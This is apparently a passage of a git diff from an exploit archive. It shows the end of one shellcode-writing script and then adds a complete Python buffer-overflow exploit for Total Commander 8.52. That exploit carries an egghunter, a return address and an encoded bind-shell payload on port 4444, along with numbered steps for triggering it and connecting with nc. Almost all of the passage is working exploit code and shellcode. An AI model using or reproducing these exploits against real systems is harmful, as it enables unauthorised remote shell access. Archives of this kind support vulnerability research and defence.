buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
|
||||
"\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
|
||||
"\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
|
||||
"\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
|
||||
"\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
|
||||
"\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
|
||||
"\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
|
||||
"\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
|
||||
"\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
|
||||
"\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
|
||||
"\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
|
||||
"\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
|
||||
"\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
|
||||
"\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
|
||||
"\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
|
||||
"\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
|
||||
"\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
|
||||
"\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
|
||||
"\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
|
||||
"\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
|
||||
"\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
|
||||
"\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
|
||||
"\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
|
||||
"\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
|
||||
|
||||
buffer += "\x90" *10
|
||||
|
||||
file.write(buffer)
|
||||
|
||||
file.close()
|
55
platforms/windows/local/38244.py
Executable file
55
platforms/windows/local/38244.py
Executable file
|
@ -0,0 +1,55 @@
|
|||
#!/usr/bin/python
|
||||
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
|
||||
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
|
||||
# Credits: Un_N0n
|
||||
# Date of Testing: 19th September 2015
|
||||
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
|
||||
# Tested On : Windows XP Service Pack 2
|
||||
# Steps to Exploit
|
||||
# Step 1: Execute this python script
|
||||
# Step 2: This script will create a file called time.txt
|
||||
# Step 3: Copy the contents of time.txt file
|
||||
# Step 4: Now open Total Commander 8.52
|
||||
# Step 5: Go To file > Change Attributes.
|
||||
# Step 6: In time field paste the contents of time.txt
|
||||
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
|
||||
file = open('time.txt' , 'w');
|
||||
|
||||
buffer = "\x90"*190
|
||||
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX
|
||||
|
||||
buffer += "\x90"*(265- len(buffer))
|
||||
|
||||
buffer += "\x47\x47\xf7\x75" #75F74747 FFE0 JMP EAX
|
||||
|
||||
# bad characters - \x00\x0a\x0d
|
||||
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
|
||||
|
||||
buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
|
||||
"\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
|
||||
"\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
|
||||
"\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
|
||||
"\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
|
||||
"\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
|
||||
"\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
|
||||
"\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
|
||||
"\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
|
||||
"\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
|
||||
"\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
|
||||
"\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
|
||||
"\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
|
||||
"\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
|
||||
"\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
|
||||
"\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
|
||||
"\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
|
||||
"\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
|
||||
"\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
|
||||
"\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
|
||||
"\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
|
||||
"\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
|
||||
"\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
|
||||
"\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
|
||||
|
||||
file.write(buffer)
|
||||
|
||||
file.close()
|
Loading…
Add table
Reference in a new issue